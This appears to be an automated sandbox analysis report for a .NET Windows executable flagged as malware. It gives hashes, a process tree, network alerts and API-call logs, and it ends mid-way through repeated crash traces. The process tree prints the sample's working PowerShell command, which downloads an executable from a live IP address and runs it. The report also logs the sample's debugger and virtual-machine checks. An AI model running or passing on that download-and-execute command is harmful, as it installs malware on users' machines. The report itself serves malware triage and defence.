Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Aug. 31, 2021, 11 a.m.	Aug. 31, 2021, 11:12 a.m.

Size	4.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`aa17e1f1f3f2b6b46064b5f425b5a12d`
SHA256	`92a2ce50aae50a6a1f63f3e522da114fba63de1f7858bc672f9fee3d7b70374a`
CRC32	`3DC5B03C`
ssdeep	`48:6bt52+6sMJ3lRCQ0o7jhIB5Zsjyi8vguhPlniDAXulHYdqXSfbNtm:S5nubN79i+jZuhNni11Y3zNt`
Yara	PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware Is_DotNET_EXE - (no description) IsPE32 - (no description)

vbc.exe "C:\Users\test22\AppData\Local\Temp\vbc.exe"
1660
- cmd.exe "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://193.169.255.212/pnb/vbc.exe', '%AppData%\\vbc.exe') & powershell Start-Process -FilePath '%AppData%\\vbc.exe' & exit
  2864
  - powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://193.169.255.212/pnb/vbc.exe', 'C:\Users\test22\AppData\Roaming\\vbc.exe')
    2156
  - powershell.exe powershell Start-Process -FilePath 'C:\Users\test22\AppData\Roaming\\vbc.exe'
    784
    - vbc.exe "C:\Users\test22\AppData\Roaming\vbc.exe"
      2024
      - sys4h57g.exe "C:\Users\test22\AppData\Local\sys30\sys4h57g.exe"
        2376
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
www.google.com	A 172.217.24.68 A 142.250.196.132	172.217.175.4

IP Address	Status	Action
13.107.21.200	Active	Moloch
142.250.196.132	Active	Moloch
164.124.101.2	Active	Moloch
172.217.24.68	Active	Moloch
193.169.255.212	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49170 -> 172.217.24.68:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49175 -> 13.107.21.200:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49166 -> 193.169.255.212:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.102:49166 -> 193.169.255.212:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 193.169.255.212:80 -> 192.168.56.102:49166	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 193.169.255.212:80 -> 192.168.56.102:49166	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 193.169.255.212:80 -> 192.168.56.102:49166	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.102:49171 -> 204.79.197.200:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49174 -> 142.250.196.132:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49170 172.217.24.68:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	50:9d:4c:90:97:dd:23:de:78:ad:a2:09:25:c9:6b:30:0c:13:f1:94
TLSv1 192.168.56.102:49175 13.107.21.200:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02	CN=www.bing.com	e6:d6:8f:e4:5e:31:2c:7f:a5:1a:6c:d5:bb:5c:15:c6:54:47:bf:47
TLSv1 192.168.56.102:49171 204.79.197.200:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02	CN=www.bing.com	e6:d6:8f:e4:5e:31:2c:7f:a5:1a:6c:d5:bb:5c:15:c6:54:47:bf:47
TLSv1 192.168.56.102:49174 142.250.196.132:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	50:9d:4c:90:97:dd:23:de:78:ad:a2:09:25:c9:6b:30:0c:13:f1:94

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 31, 2021, 10:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2021, 10:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2021, 10:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2021, 10:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 31, 2021, 10:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2021, 10:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2021, 10:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2021, 11:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2021, 11:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2021, 11:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2021, 11:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 31, 2021, 11:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2021, 11:10 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (8 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 31, 2021, 10:50 a.m.			0	0
IsDebuggerPresent Aug. 31, 2021, 10:50 a.m.			0	0
IsDebuggerPresent Aug. 31, 2021, 10:50 a.m.			0	0
IsDebuggerPresent Aug. 31, 2021, 11:10 a.m.			0	0
IsDebuggerPresent Aug. 31, 2021, 11:11 a.m.			0	0
IsDebuggerPresent Aug. 31, 2021, 11:11 a.m.			0	0
IsDebuggerPresent Aug. 31, 2021, 11:11 a.m.			0	0
IsDebuggerPresent Aug. 31, 2021, 11:11 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (50 out of 86 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000221e00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7feae0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7feae0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7feae0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7feb50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7feb50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7fec30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7fec30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7fec30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7fec30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff100 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff100 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff100 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7fec30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7fec30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7fec30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff100 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff100 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff100 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff100 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff100 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff100 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff100 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff100 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff5d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff5d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff5d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff6b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff6b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff100 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff100 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff720 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff720 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff720 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000206740 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000206740 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000206740 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000206740 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b82b1e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 10:50 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b82b1e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002f3bf0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b576710 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b576710 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b576710 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b576470 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b576470 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b576550 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b576550 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b576550 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2021, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b576550 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 31, 2021, 10:50 a.m.		1	1	0

One or more processes crashed (24 events)

Time & API	Arguments	Status
__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0xad0ea0 0xad0bf2 0xad043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72f92652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72fa264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72fa2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x730574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73057610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x730e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x730e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x730e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x730e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad13ac registers.esp: 2355804 registers.edi: 37871916 registers.eax: 0 registers.ebp: 2355876 registers.edx: 0 registers.ebx: 37870384 registers.esi: 37562064 registers.ecx: 1912425774	1
__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0xad0ea0 0xad0bf2 0xad043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72f92652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72fa264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72fa2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x730574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73057610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x730e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x730e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x730e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x730e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad13ac registers.esp: 2355804 registers.edi: 37897344 registers.eax: 0 registers.ebp: 2355876 registers.edx: 0 registers.ebx: 37870492 registers.esi: 37562064 registers.ecx: 1912425774	1
__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0xad0ea0 0xad0bf2 0xad043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72f92652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72fa264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72fa2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x730574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73057610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x730e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x730e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x730e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x730e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad13ac registers.esp: 2355804 registers.edi: 37904560 registers.eax: 0 registers.ebp: 2355876 registers.edx: 0 registers.ebx: 37870600 registers.esi: 37562064 registers.ecx: 1912425774	1
__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0xad0ea0 0xad0bf2 0xad043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72f92652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72fa264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72fa2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x730574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73057610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x730e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x730e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x730e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x730e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad13ac registers.esp: 2355804 registers.edi: 37911776 registers.eax: 0 registers.ebp: 2355876 registers.edx: 0 registers.ebx: 37870708 registers.esi: 37562064 registers.ecx: 1912425774	1
__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0xad0ea0 0xad0bf2 0xad043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72f92652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72fa264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72fa2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x730574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73057610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x730e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x730e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x730e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x730e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad13ac registers.esp: 2355804 registers.edi: 37918992 registers.eax: 0 registers.ebp: 2355876 registers.edx: 0 registers.ebx: 37870816 registers.esi: 37562064 registers.ecx: 1912425774	1
__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0xad0ea0 0xad0bf2 0xad043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72f92652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72fa264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72fa2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x730574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73057610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x730e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x730e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x730e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x730e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad13ac registers.esp: 2355804 registers.edi: 37926208 registers.eax: 0 registers.ebp: 2355876 registers.edx: 0 registers.ebx: 37870924 registers.esi: 37562064 registers.ecx: 1912425774	1
__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0xad0ea0 0xad0bf2 0xad043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72f92652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72fa264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72fa2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x730574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73057610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x730e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x730e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x730e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x730e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad13ac registers.esp: 2355804 registers.edi: 37933424 registers.eax: 0 registers.ebp: 2355876 